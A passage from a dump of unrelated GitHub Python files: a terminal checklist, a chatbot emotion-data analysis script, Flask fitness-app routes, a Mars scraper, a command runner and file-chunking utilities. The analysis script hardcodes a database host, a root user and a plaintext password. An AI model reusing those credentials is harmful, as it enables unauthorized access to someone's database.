USING TERMCOLOR MODULE FOR COLORED TEXT: https://pypi.org/project/termcolor/\nfrom termcolor import colored\n\nchecklist = list()\n\n# RANDOM COLOR SELECTOR\ndef color_selector():\n color_list = ['grey', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan']\n return random.choice(color_list)\n\n# CREATE\ndef create(item):\n colored_item = colored(item, color_selector())\n checklist.append(colored_item)\n\n# READ\ndef read(index):\n try:\n item = checklist[index]\n return item\n except IndexError:\n return(\"\\nIndex does not exist.\")\n\n# UPDATE\ndef update(index, item):\n try:\n checklist[index] = colored(item, color_selector())\n return(\"\\nItem at index \" + str(index) + \" updated to \" + item)\n except IndexError:\n return(\"\\nIndex does not exist.\")\n\n# DESTROY\ndef destroy(index):\n try:\n checklist.pop(index)\n return(\"\\nItem at index \" + str(index) + \" removed.\")\n except IndexError:\n return(\"\\nIndex does not exist.\")\n\n# MARK COMPLETED\ndef mark_completed(index):\n item = checklist[index]\n\n if item[0] != \"√\":\n checklist[index] = \"√ \" + checklist[index]\n return(\"\\nItem marked as complete.\")\n else:\n return(\"\\nItem is already marked as complete.\")\n\n# MARK INCOMPLETE\ndef mark_incomplete(index):\n item = checklist[index]\n \n if item[0] == \"√\":\n incompleted_item = item.replace(\"√ \",\"\")\n checklist[index] = incompleted_item\n return(\"\\nItem marked as incomplete.\")\n else:\n return(\"\\nItem is already marked as incomplete.\")\n\n# LIST ALL ITEMS\ndef list_all_items():\n index = 0\n for list_item in checklist:\n print(\"{} {}\".format(index, list_item))\n index += 1\n\n# SELECT OPTIONS\ndef select(function_code):\n # Create item\n if function_code == \"a\":\n input_item = user_input(\"Input item: \")\n create(input_item)\n\n # Read item\n elif function_code == \"r\":\n item_index = int(user_input(\"Index Number: \"))\n print(\"\\n\" + read(item_index))\n\n # Print all items\n elif function_code == \"l\":\n list_all_items()\n\n # Update item\n elif function_code == \"u\":\n item_index = int(user_input(\"Index Number: \"))\n update_item = user_input(\"Input item: \")\n print(update(item_index, update_item))\n\n # Destroy item\n elif function_code == \"d\":\n item_index = int(user_input(\"Index Number: \"))\n print(destroy(item_index))\n \n # Mark Complete/Incomplete\n elif function_code == \"m\":\n complete_incomplete = user_input(\"Mark as Complete or Incomplete?(Enter C/I): \").lower()\n\n if complete_incomplete == \"c\":\n item_index = int(user_input(\"Index Number: \"))\n print(mark_completed(item_index))\n \n elif complete_incomplete == \"i\":\n item_index = int(user_input(\"Index Number: \"))\n print(mark_incomplete(item_index))\n \n else:\n print(\"Invalid Option\")\n\n elif function_code == \"q\":\n return False\n\n # Catch all\n else:\n print(\"Unknown Option\")\n return True\n\n# USER INPUT\ndef user_input(prompt):\n user_input = input(prompt)\n return user_input\n\n# TESTING FUNCTIONS\ndef test():\n create(\"purple sox\")\n create(\"red cloak\")\n\n print(read(0))\n print(read(1))\n\n update(0, \"purple socks\")\n\n destroy(1)\n\n print(read(0))\n mark_completed(0)\n\n list_all_items()\n\n select(\"C\")\n list_all_items()\n\n select(\"R\")\n list_all_items()\n\n select(\"P\")\n list_all_items()\n\n# RUN TESTS\ntest()\n\nrunning = True\nwhile running:\n os.system(\"clear\")\n selection = user_input(\n \"Press A to Add to list, R to Read from list, L to Display list, U to Update item, D to Destroy item, M to Mark Complete/Incomplete, and 
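The checklist above stores each entry pre-colored via termcolor and marks completion with a '√ ' prefix; a tiny standalone illustration of both conventions:

import random
from termcolor import colored

colors = ['grey', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan']
item = colored("buy milk", random.choice(colors))   # ANSI escape codes wrap the text
print("√ " + item)                                  # rendered as a completed entry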
Q to quit: \")\n selection_both_cases = selection.lower()\n running = select(selection_both_cases)\n input(\"\\nPress Enter to Continue...\")","repo_name":"soundreaper/CaptainRainbowsColorChecklist","sub_path":"checklist.py","file_name":"checklist.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28936632572","text":"import pymysql\nimport pandas as pd\nimport datetime\nimport numpy as np\nimport random as rd\n\nimport matplotlib.pyplot as plt\nimport matplotlib\n\n\n# Emotion data database\nmysql = pymysql.connect(\n host='35.201.169.147',\n user='root',\n password='1thefull!',\n db='silverCare'\n)\n\n\nemotion_df = pd.read_sql_query(\"SELECT b.SORT, a.REGISTRATION_DATE, a.PUDDING_SERIALNUM, CASE IFNULL(EMOTION, '') WHEN '긍정' THEN 1 * EMOTION_SCORE WHEN '부정' THEN -1 * EMOTION_SCORE ELSE 0 END AS emotionScore FROM ROJA_HI_LOG a, PUDDING_SERIALNUM b WHERE a.PUDDING_SERIALNUM = b.PUDDING_SERIALNUM AND a.SEND_SORT = 'asr' AND a.SENDER <> 'ROJA'\", mysql)\n\n\nclass investigate_emotion:\n \"\"\"\n Use emotion/usage data collected by Dasom.\n Example:\n\n # Get the data of users by region\n busanjin_emotion = investigate_emotion('busanjin')\n gimpojin_emotion = investigate_emotion('Gimpo')\n\n # Plot the change of a user's emotion score by time\n plt.figure(figsize=(16, 8))\n random_user_plot = busanjin_emotion.userEmotionScore(rd.choice(busanjin_emotion.user_list), legend=True)\n\n plt.figure(figsize=(16, 8))\n for user in busanjin_emotion.user_list:\n random_user_plot = busanjin_emotion.userEmotionScore(user)\n\n # Plot the change of aggregated emotion score by time\n plt.figure(figsize=(16, 8))\n busanjin_emotion.totalEmotionScore()\n plt.hlines(y=0, xmin=busanjin_emotion.region_emotion_df.date.iloc[0],\n xmax=busanjin_emotion.region_emotion_df.date.iloc[-1], color=\"red\")\n\n # Plot the change of a user's usage frequency by time\n busanjin_emotion.userFrequency(rd.choice(busanjin_emotion.user_list))\n\n # Plot the change of aggregated usage frequency by time\n busanjin_emotion.totalFrequency(normalize_by_people=True)\n \"\"\"\n\n def __init__(self, region):\n self.region = region\n self.region_emotion_df = emotion_df[(emotion_df.SORT == self.region) & (emotion_df.REGISTRATION_DATE > datetime.date(2019, 12, 1))]\n self.user_list = list(set(self.region_emotion_df.PUDDING_SERIALNUM))\n\n \n \n def userEmotionScore(self, user, period='24H', legend=False):\n # self.region: Gimpo, busanjin, B2C\n user_specific_data = self.region_emotion_df[self.region_emotion_df.PUDDING_SERIALNUM == user]\n user_specific_data[period] = user_specific_data.REGISTRATION_DATE.dt.floor(period)\n mean_data = user_specific_data.groupby(period).mean()\n std_data = user_specific_data.groupby(period).std()\n plt.plot(mean_data.index, mean_data.emotionScore, 'o-', label=user)\n plt.fill_between(mean_data.index, mean_data.emotionScore-std_data.emotionScore,\n mean_data.emotionScore+std_data.emotionScore, alpha=0.3)\n plt.xticks(mean_data.index[[int((mean_data.index.__len__()-1)/3*i) for i in range(3)]])\n if legend == True:\n plt.legend()\n \n \n\n def totalEmotionScore(self, period='24H', legend=False):\n # self.region: Gimpo, busanjin, B2C\n total_data = self.region_emotion_df\n total_data[period] = total_data.REGISTRATION_DATE.dt.floor(period)\n mean_data = total_data.groupby(period).mean()\n std_data = total_data.groupby(period).std()\n plt.plot(mean_data.index, mean_data.emotionScore, 'o-')\n 
plt.fill_between(mean_data.index, mean_data.emotionScore-std_data.emotionScore,\n mean_data.emotionScore+std_data.emotionScore, alpha=0.3)\n plt.xticks(mean_data.index[[int((mean_data.index.__len__()-1)/3*i) for i in range(3)]])\n if legend == True:\n plt.legend()\n \n\n# def emotionRatio(self, user): # Calculate the ratio of positive/negative ratio (dismiss emotion score)\n\n \n def userFrequency(self, user, alpha=None):\n user_specific_data = self.region_emotion_df[self.region_emotion_df.PUDDING_SERIALNUM == user]\n user_specific_data['date'] = user_specific_data.REGISTRATION_DATE.map(lambda x: x.date())\n count_per_date = user_specific_data.groupby('date').count()['REGISTRATION_DATE']\n \n plt.bar(count_per_date.index, count_per_date, alpha=alpha)\n plt.xticks([count_per_date.index[0], count_per_date.index[-1]])\n plt.ylabel(\"Number of use\")\n plt.xlabel(\"Date\")\n \n \n def totalFrequency(self, normalize_by_people=False):\n total_data = self.region_emotion_df\n total_data['date'] = total_data.REGISTRATION_DATE.map(lambda x: x.date())\n\n count_per_date = total_data.groupby('date').count()['REGISTRATION_DATE']\n\n if normalize_by_people:\n accumulate_count_df = pd.DataFrame(columns=['date', 'PUDDING_SERIALNUM'],\n data=[list(i) for i in total_data.groupby(['date', 'PUDDING_SERIALNUM']).count().index.values])\n accumulate_count_df.set_index('date', inplace=True)\n\n all_users = []\n prev_date = accumulate_count_df.index[0]\n accumulate_count = 0\n accumulate_count_list = []\n for count, (idx, row) in enumerate(accumulate_count_df.iterrows()):\n if idx != prev_date:\n accumulate_count_list.append(accumulate_count)\n prev_date = idx\n if row.PUDDING_SERIALNUM not in all_users:\n all_users.append(row.PUDDING_SERIALNUM)\n accumulate_count += 1\n accumulate_count_list.append(accumulate_count)\n\n plt.bar(count_per_date.index, count_per_date/np.array(accumulate_count_list))\n else:\n plt.bar(count_per_date.index, count_per_date)\n plt.xticks([count_per_date.index[0], count_per_date.index[-1]])\n plt.ylabel(\"Number of use\")\n plt.xlabel(\"Date\")\n","repo_name":"swoh816/DasomDataAnalysis","sub_path":"Emotion/emotion_usage_analysis.py","file_name":"emotion_usage_analysis.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6043624199","text":"from flask import current_app as app\nfrom flask import (render_template,\n redirect,\n flash,\n url_for,\n request)\nfrom flask_login import (current_user,\n login_user,\n logout_user,\n login_required)\n\nfrom .models import db\nfrom .models.posts import Post\nfrom .models.user import User\nfrom .utils import complete_profile_required\nfrom .forms import (RegistrationForm,\n LoginForm,\n EditProfileForm,\n ChangePasswordForm,\n ChangeUsernameForm,\n ChangeEmailForm,\n PostForm,\n EmptyForm)\nfrom .json_info import exercise\nfrom .json_info import mealplan\n\nmealplans = mealplan.MealPlan()\nexerciseplan = exercise.ExercisePlan()\n\n\n#default page to load to when user isn't signed in\n@app.route('/index')\ndef index():\n return render_template('index.html', title='Home')\n\n#home page when user is signed in, shows users current mealplan and exercise\n@app.route('/')\n@app.route('/home')\n@login_required\ndef home():\n return render_template('home.html', title='Home', user = current_user,\n currente = exerciseplan.get_exercise(current_user.get_exercise()), currentm = mealplans.get_mealplan(current_user.get_mealplan()))\n\n#redirect to all 
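The plotting methods above bucket timestamps with Series.dt.floor('24H') before grouping; a minimal pandas demonstration of that bucketing on synthetic rows:

import pandas as pd

df = pd.DataFrame({
    "REGISTRATION_DATE": pd.to_datetime(
        ["2019-12-02 09:15", "2019-12-02 21:40", "2019-12-03 08:05"]),
    "emotionScore": [1.0, -0.5, 0.8],
})
df["24H"] = df.REGISTRATION_DATE.dt.floor("24H")   # both Dec 2 rows share one bucket
daily_mean = df.groupby("24H").emotionScore.mean()
assert daily_mean.iloc[0] == 0.25                  # (1.0 + -0.5) / 2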
exercises\n@app.route('/redirectexercises', methods=['GET','POST'])\n@login_required\ndef redirectexercises():\n return redirect(url_for('exercises'))\n\n#redirect to all mealplans\n@app.route('/redirectmeals', methods=['GET','POST'])\n@login_required\ndef redirectmeals():\n return redirect(url_for('meals'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = LoginForm()\n\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n flash('Invalid username or password.', 'danger')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n return redirect(url_for('home'))\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return render_template('index.html', title='Logout')\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('index', title='Already registered.'))\n\n form = RegistrationForm()\n\n if form.validate_on_submit():\n user = User(\n username=form.username.data,\n email=form.email.data,\n profile_completed=False,\n exercise_weight_id = [],\n exercise_weight = []\n )\n user.set_password(form.password.data)\n db.session.add(user)\n db.session.commit()\n return redirect(url_for('edit_profile'))\n return render_template('register.html', form=form)\n\n\n@app.route('/profile', methods=['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef profile():\n return redirect(url_for('user', username=current_user.username))\n\n\n@app.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.first_name = form.first_name.data\n current_user.last_name = form.last_name.data\n current_user.birthdate = form.birthdate.data\n current_user.height = form.height.data\n current_user.weight = form.weight.data\n current_user.profile_completed = True\n db.session.commit()\n flash('Changes have been saved.', 'success')\n return redirect(url_for('profile'))\n elif request.method == 'GET':\n form.first_name.data = current_user.first_name\n form.last_name.data = current_user.last_name\n form.birthdate.data = current_user.birthdate\n form.height.data = current_user.height\n form.weight.data = current_user.weight\n return render_template('forms/edit_profile.html', title='Edit Profile',\n form=form, user=current_user)\n\n\n@app.route('/account')\n@login_required\ndef account():\n return render_template('account.html', title='Account', user=current_user)\n\n\n@app.route('/change_password', methods=['GET', 'POST'])\n@login_required\ndef change_password():\n form = ChangePasswordForm()\n\n if form.validate_on_submit():\n current_user.set_password(form.new_password.data)\n db.session.commit()\n\n return render_template(\n 'forms/change_password.html', title='Change Password', form=form\n )\n\n\n@app.route('/change_email', methods=['GET', 'POST'])\n@login_required\ndef change_email():\n form = ChangeEmailForm()\n\n if form.validate_on_submit():\n current_user.email = form.new_email.data\n db.session.commit()\n elif request.method == 'GET':\n form.new_email.data = current_user.email\n form.new_email_repeat.data = current_user.email\n\n return render_template(\n 'forms/change_email.html', title='Change Email', form=form\n 
)\n\n\n@app.route('/change_username', methods=['GET', 'POST'])\n@login_required\ndef change_username():\n    form = ChangeUsernameForm()\n\n    if form.validate_on_submit():\n        current_user.username = form.new_username.data\n        db.session.commit()\n    elif request.method == 'GET':\n        form.new_username.data = current_user.username\n\n    return render_template(\n        'forms/change_username.html', title='Change Username', form=form\n    )\n\n\n@app.route('/user/<username>', methods=['GET', 'POST'])\n@login_required\ndef user(username: str):\n    user = User.query.filter_by(username=username).first_or_404()\n    posts = user.posts\n    form = EmptyForm()\n    return render_template('user.html', user=user, posts=posts, form=form, exerciseplan=exerciseplan)\n\n#looking at a specific mealplan\n@app.route('/meal/<int:meal_id>')\n@login_required\n@complete_profile_required\n#must input id of meal looking at, allows function to be general for all meals\ndef meal(meal_id: int):\n    print(mealplans.get_mealplan(meal_id))\n    return render_template('meal.html', title=f'Meal: {meal_id}',\n        user = current_user, meal = mealplans.get_mealplan(meal_id))\n\n#set the users current mealplan, method to respond to the button in /meal/\n@app.route('/setmeal', methods = ['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef setmeal():\n    if request.method == 'POST':\n        sw = request.form.get('action2')\n        for meal in mealplans.get_mealplans():\n            #determine which meal is being set to the current\n            if sw == 'Set ' + str(meal) + ' As Current Meal':\n                current_user.set_mealplan(meal.get_id())\n    #redirect back to all meals after setting current\n    return redirect(url_for('meals'))\n\n#view all meals, also handles button to view a specific meal\n@app.route('/meals', methods=['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef meals():\n    #if a button is pressed, determine which button was pressed and redirect to the correct mealplan\n    if request.method == 'POST':\n        sw = request.form.get('action1')\n        return redirect(url_for('meal', meal_id = mealplans.get_mealplan_based_on_name(sw).get_id())) \n    #if button wasn't pressed, simply display meals\n    return render_template('meals.html', title='Meals',\n        user = current_user, current = mealplans.get_mealplan(current_user.get_mealplan()), mealplans = mealplans.get_mealplans())\n\n#view all exercises, also handles button to view specific exercise\n@app.route('/exercises', methods=['GET','POST'])\n@login_required\n@complete_profile_required\ndef exercises():\n    #if button is pressed, determine which button was pressed and redirect to the correct exercise\n    if request.method == 'POST':\n        sw = request.form.get('action1')\n        return redirect(url_for('exercise', exercise_id = exerciseplan.get_exercise_based_on_name(sw).get_id()))\n    #if button wasn't pressed, simply display all exercises\n    else:\n        return render_template('exercises.html', title='Exercises',\n            user=current_user, current = exerciseplan.get_exercise(current_user.get_exercise()), exercises = exerciseplan.get_exercises())\n\n#view a specific exercise \n#handles both weighted and unweighted exercises\n@app.route('/exercise/<int:exercise_id>', methods=['GET','POST'])\n@login_required\n@complete_profile_required\ndef exercise(exercise_id: int):\n    #determine if the exercise associated with exercise_id is weighted or not\n    if(exerciseplan.get_exercise(exercise_id).is_weighted()):\n        #display weighted exercise, utilizes current_user.get_exercise_weight to account for custom weights\n        return render_template('exerciseweighted.html', title=f'Exercise: {exercise_id}',\n            user = current_user, 
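Route converters such as '/meal/<int:meal_id>' make Flask reject non-numeric ids before the view runs; a self-contained demonstration with a throwaway app (names are illustrative):

from flask import Flask

demo = Flask(__name__)

@demo.route("/meal/<int:meal_id>")
def demo_meal(meal_id: int):
    return f"meal {meal_id}"

client = demo.test_client()
assert client.get("/meal/3").status_code == 200
assert client.get("/meal/abc").status_code == 404  # the int converter refuses to match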
weight = current_user.get_exercise_weight(exercise_id), exercise = exerciseplan.get_exercise(exercise_id))\n    else:\n        #display unweighted exercise\n        return render_template('exercise.html', title=f'Exercise: {exercise_id}', \n            user = current_user, exercise = exerciseplan.get_exercise(exercise_id))\n\n#set current exercise, responds to button in /exercise/\n@app.route('/setexercise', methods=['GET','POST'])\n@login_required\n@complete_profile_required\ndef setexercise():\n    if request.method == 'POST':\n        sw = request.form.get('action2')\n        #determine which exercise to set to current\n        for exercise in exerciseplan.get_exercises():\n            if sw == 'Set ' + str(exercise) + ' As Current Exercise':\n                current_user.set_exercise(exercise.get_id())\n                return redirect(url_for('postexercise', exercise_id=exercise.get_id()))\n\n@app.route('/postexercise/<exercise_id>', methods=['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef postexercise(exercise_id):\n    form = PostForm()\n\n    if request.method == 'POST':\n        if form.validate_on_submit():\n            post = Post(\n                user_id=current_user.id,\n                exercise=exercise_id,\n                body=form.post.data\n            )\n            db.session.add(post)\n            db.session.commit()\n            flash('Your post is now live!')\n            return redirect(url_for('exercises'))\n    return render_template('postexercise.html', user=current_user, form=form,\n        exercise=exerciseplan.get_exercise(exercise_id))\n\n#set a custom weight for an exercise\n#responds to button in /exercise/\n@app.route('/setweight', methods=['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef setweight():\n    sw = request.form.get('action2')\n    #determine which exercise to set the weight for \n    for exercise in exerciseplan.get_exercises():\n        if sw == 'Set ' + str(exercise) + \"'s weight\":\n            #set the weight for current_user to whatever is pulled from the text box\n            current_user.set_exercise_weight(exercise.get_id(), request.form['text'])\n    return redirect(url_for('home'))\n\n\n@app.route('/follow/<username>', methods=['POST'])\n@login_required\ndef follow(username):\n    form = EmptyForm()\n    if form.validate_on_submit():\n        user = User.query.filter_by(username=username).first()\n        if user is None:\n            flash('User {} not found.'.format(username), 'danger')\n            return redirect(url_for('index'))\n        current_user.follow(user)\n        db.session.commit()\n        flash('You are following {}!'.format(username), 'success')\n        return redirect(url_for('user', username=username))\n    else:\n        return redirect(url_for('index'))\n\n\n@app.route('/unfollow/<username>', methods=['POST'])\n@login_required\ndef unfollow(username):\n    form = EmptyForm()\n    if form.validate_on_submit():\n        user = User.query.filter_by(username=username).first()\n        if user is None:\n            flash('User {} not found.'.format(username), 'danger')\n            return redirect(url_for('index'))\n        current_user.unfollow(user)\n        db.session.commit()\n        flash('You are not following {}.'.format(username), 'success')\n        return redirect(url_for('user', username=username))\n    else:\n        return redirect(url_for('index'))\n\n\n@app.route('/user/<username>/followers')\ndef followers_list(username: str):\n    user = User.query.filter_by(username=username).first_or_404()\n    followers = user.followers\n    return render_template(\n        'followers.html', title='Followers', followers=followers, user=user\n    )\n\n\n@app.route('/user/<username>/followed')\ndef followings_list(username: str):\n    user = User.query.filter_by(username=username).first_or_404()\n    followed = user.followed\n    return render_template(\n        'followed.html', title='Followed', followed=followed, user=user\n    )\n\n@app.route('/social')\ndef social():\n    posts = 
current_user.followed_posts().all()\n return render_template(\"social.html\", title='Social',\n posts=posts, exerciseplan=exerciseplan)\n\n\n\n# vim: ft=python ts=4 sw=4 sts=4\n","repo_name":"anair14/3380-project-team","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":13320,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"37146324360","text":"from splinter import Browser\nimport requests\nfrom bs4 import BeautifulSoup\nfrom sys import platform\nimport time\nimport pandas\n\ndef init_browser():\n if platform == \"darwin\":\n executable_path = {\"executable_path\": \"/usr/local/bin/chromedriver\"}\n else:\n executable_path = {'executable_path': 'chromedriver.exe'}\n return Browser(\"chrome\", **executable_path, headless=True)\n\ndef scrape_url():\n url = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204%3A19&blank_scope=Latest'\n\n browser = init_browser()\n four_pics = []\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n \n news_title = soup.find_all(\"div\", class_=\"content_title\")[0]\n \n news_title = news_title.text.strip()\n\n time.sleep(3)\n\n news_p = soup.find_all(\"div\", class_=\"article_teaser_body\")[0]\n \n news_p = news_p.text.strip()\n\n browser.quit()\n \n url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n \n browser = init_browser()\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n pics = soup.find('article', class_='carousel_item')\n full_pic = pics('a', class_='button fancybox')\n time.sleep(2)\n \n browser.click_link_by_id(\"full_image\")\n time.sleep(1)\n browser.click_link_by_partial_text(\"more info\")\n\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n img = soup.find('figure', class_=\"lede\")\n img_url = img.find(\"a\")['href']\n featured_image_url = (img.find(\"img\", class_=\"main_image\")['src'])\n featured_image_link = 'https://www.jpl.nasa.gov' + featured_image_url\n \n browser.quit()\n \n url = 'https://twitter.com/marswxreport?lang=en'\n\n browser = init_browser()\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n weather_mars = soup.find_all('p', class_=\"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\")[0]\n weather_mars = weather_mars.text.strip()\n \n browser.quit()\n \n url = 'https://space-facts.com/mars/'\n \n browser = init_browser()\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n mars_facts = soup.find_all(\"table\")[0]\n pandas.read_html('https://space-facts.com/mars/')\n\n mars_facts_table = pandas.read_html('https://space-facts.com/mars/')\n \n browser.quit()\n \n url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n\n browser = init_browser()\n browser.visit(url)\n time.sleep(1)\n\n html = browser.html\n result = BeautifulSoup(html, 'html.parser')\n results = result.find_all('div', class_=\"result-list\")\n new_link = results[0].find_all('a', class_='itemLink product-item')[0]['href']\n link_names = 'https://astrogeology.usgs.gov' + new_link\n \n browser.visit(link_names)\n html = browser.html\n result = BeautifulSoup(html, 'html.parser')\n link_ready = result.find_all('div', class_=\"downloads\")[0].find('a')['href']\n browser.back()\n browser.quit()\n \n url = 
'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n\n browser = init_browser()\n mars = {}\n browser.visit(url)\n html = browser.html\n result = BeautifulSoup(html, 'html.parser')\n results = result.find_all('div', class_=\"description\")\n \n for result in results:\n title = result.find('a', class_=\"itemLink product-item\").find('h3').text\n new_link = result.find_all('a', class_='itemLink product-item')[0]['href']\n link_names = 'https://astrogeology.usgs.gov' + new_link\n browser.visit(link_names)\n html = browser.html\n result = BeautifulSoup(html, 'html.parser')\n link_ready = result.find_all('div', class_=\"downloads\")[0].find('a')['href']\n browser.back() \n four_pics.append(title)\n four_pics.append(link_ready) \n \n mars['news_p'] = news_p\n mars['featured_image_link'] = featured_image_link\n mars['news_title'] = news_title\n mars['weather_mars'] = weather_mars\n mars['mars_facts_table'] = mars_facts_table \n mars['link_ready'] = link_ready\n mars['title'] = title\n four_pics.append(mars)\n\n browser.quit()\n return [four_pics]\n ","repo_name":"GAlves92/Web_Scraping_and_MongoDB","sub_path":"Web Scraping and Mongo/mission_to_mars.py","file_name":"mission_to_mars.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2793359157","text":"#!/usr/bin/python3\n\"\"\"\nRequirements:\n sudo apt install python3-pip\n pip3 install termcolor\n\"\"\"\n\n\"\"\"\nRequirements:\n sudo apt install libnotify-bin\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nfrom termcolor import colored\n\n\ndef parse(data):\n size = len(data[\"list\"])\n\n # Ask if run\n for index, item in enumerate(data[\"list\"]):\n item[\"input\"] = input(\"{}/{}: Run command {} for {}? 
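mission_to_mars.py above grabs the facts table with pandas.read_html, which parses every <table> in the source into a DataFrame; a minimal offline illustration on an inline HTML string (requires an HTML parser such as lxml to be installed):

import pandas as pd

html = ("<table><tr><th>property</th><th>value</th></tr>"
        "<tr><td>Diameter</td><td>6,779 km</td></tr></table>")
tables = pd.read_html(html)   # one DataFrame per <table> element
assert tables[0].shape == (1, 2)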
(y/N) \".format(\n index + 1,\n size,\n colored(item[\"command\"], \"green\"),\n colored(item[\"name\"], \"yellow\"),\n ))\n\n # Run if confirmed\n for index, item in enumerate(data[\"list\"]):\n if item[\"input\"].lower() == \"y\":\n print(\"{}/{}: Running {} for {}...\".format(\n index + 1,\n size,\n colored(item[\"command\"], \"green\"),\n colored(item[\"name\"], \"yellow\"),\n ))\n item[\"status\"] = subprocess.run(item[\"command\"], shell=True)\n\n print(\"{}/{}: {} finished as {}\".format(\n index + 1,\n size,\n colored(item[\"name\"], \"green\"),\n colored(item[\"status\"], \"yellow\"),\n ))\n os.system(\"notify-send -u critical {} done\".format(item[\"name\"]))\n input(colored(\n \"Press ENTER to continue...\",\n \"green\",\n attrs=[\"reverse\", \"blink\"],\n ))\n\n print(\"\")\n print(\"+---------+\")\n print(\"| Results |\")\n print(\"+---------+\")\n for item in data[\"list\"]:\n if \"status\" in item:\n print(\"{}: {}\".format(\n colored(item[\"name\"], \"green\"),\n colored(item[\"status\"], \"yellow\"),\n ))\n else:\n print(\"{}: {}\".format(\n colored(item[\"name\"], \"green\"),\n colored(\"skipped\", \"yellow\"),\n ))\n\n\nif __name__ == \"__main__\":\n with open(\"send.json\") as f:\n parse(json.load(f))\n","repo_name":"petrposvic/scripts","sub_path":"send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36395478105","text":"\n# Python program to \n# demonstrate merging \n# of two files \n \ndata = data2 = \"\" \n \n# Reading data from file1 \nwith open('final_enc','rb') as fp: \n data = fp.read() \n \n\nprint(\"len(data): \",len(data))\n\nd1=data[0:256]\nd2=data[256:]\n \nprint(\"len(rsa_encrypted_session_key_RECV): \",len(d1))\nprint(\"len(session_key_encrypted_merged_enc_hash_and_message_RECV): \",len(d2))\n\nwith open ('rsa_encrypted_session_key_RECV', 'wb') as fp: \n fp.write(d1)\n\nwith open ('session_key_encrypted_merged_enc_hash_and_message_RECV', 'wb') as fp: \n fp.write(d2) \n","repo_name":"JustKshitijD/Encryption-and-Authentication-using-OpenSSL","sub_path":"COAI/break_final_enc_for_decryption.py","file_name":"break_final_enc_for_decryption.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9481723963","text":"\"\"\"\nDeuce Valere - Client - Splitter\n\"\"\"\nimport itertools\nimport logging\n\nfrom deucevalere.common.validation_instance import *\n\n\nclass MetaChunkError(Exception):\n pass\n\n\nclass StorageChunkError(Exception):\n pass\n\n\nclass ValereSplitter(object):\n\n @validate(deuce_client=ClientRule,\n vault=VaultInstanceRule)\n def __init__(self, deuce_client, vault):\n self.deuceclient = deuce_client\n self.vault = vault\n self.log = logging.getLogger(__name__)\n\n @validate(limit=LimitRule)\n def store_chunker(self, limit):\n \"\"\"\n The store_chunker is called when the listing of metadata blocks\n yielded an empty list. 
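        (For example, the metadata id is the sha1 prefix of a storage id;
        the ids below are made up:

            >>> storage_id = 'a9993e364706816aba3e25717850c26c9cd0d89d_1b4e28ba'
            >>> storage_id.split('_')[0]
            'a9993e364706816aba3e25717850c26c9cd0d89d'

        )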
The list of storage blocks would then be\n chunked, by extracting the metadata block_id(sha1) from each of\n the storage blocks.(Since each storageblock is of the form\n sha1_uuid5)\n\n :param limit: number of elements per chunk\n :return: a list of lists containing projectid, vaultid\n start marker and end marker\n \"\"\"\n marker = None\n\n def storage_list(marker, limit):\n\n try:\n storage_ids = self.deuceclient.GetBlockStorageList(self.vault,\n marker=marker,\n limit=limit)\n except RuntimeError as ex:\n msg = 'Storage Chunking for Projectid: {0},' \\\n 'Vault: {1} failed!' \\\n 'Error : {2}'.format(self.vault.project_id,\n self.vault.vault_id,\n str(ex))\n self.log.warn(msg)\n raise StorageChunkError(msg)\n\n if not len(storage_ids):\n return (None, None, None)\n\n st_marker = self.vault.storageblocks.marker\n\n if not st_marker:\n return (storage_ids[0].split('_')[0],\n None,\n None)\n\n return (storage_ids[0].split('_')[0],\n st_marker.split('_')[0],\n st_marker)\n\n while True:\n\n start, end, st_marker = storage_list(marker, limit)\n\n if (start, end, st_marker) == (None, None, None):\n break\n\n gen_expr = [self.vault.project_id,\n self.vault.vault_id,\n start,\n end]\n marker = st_marker\n\n if start != end:\n yield gen_expr\n\n if not end: # pragma: no cover\n break\n\n @validate(limit=LimitRule)\n def meta_chunker(self, limit):\n \"\"\"\n The chunker splits the listing of metadata blocks from a vault\n that belongs to a 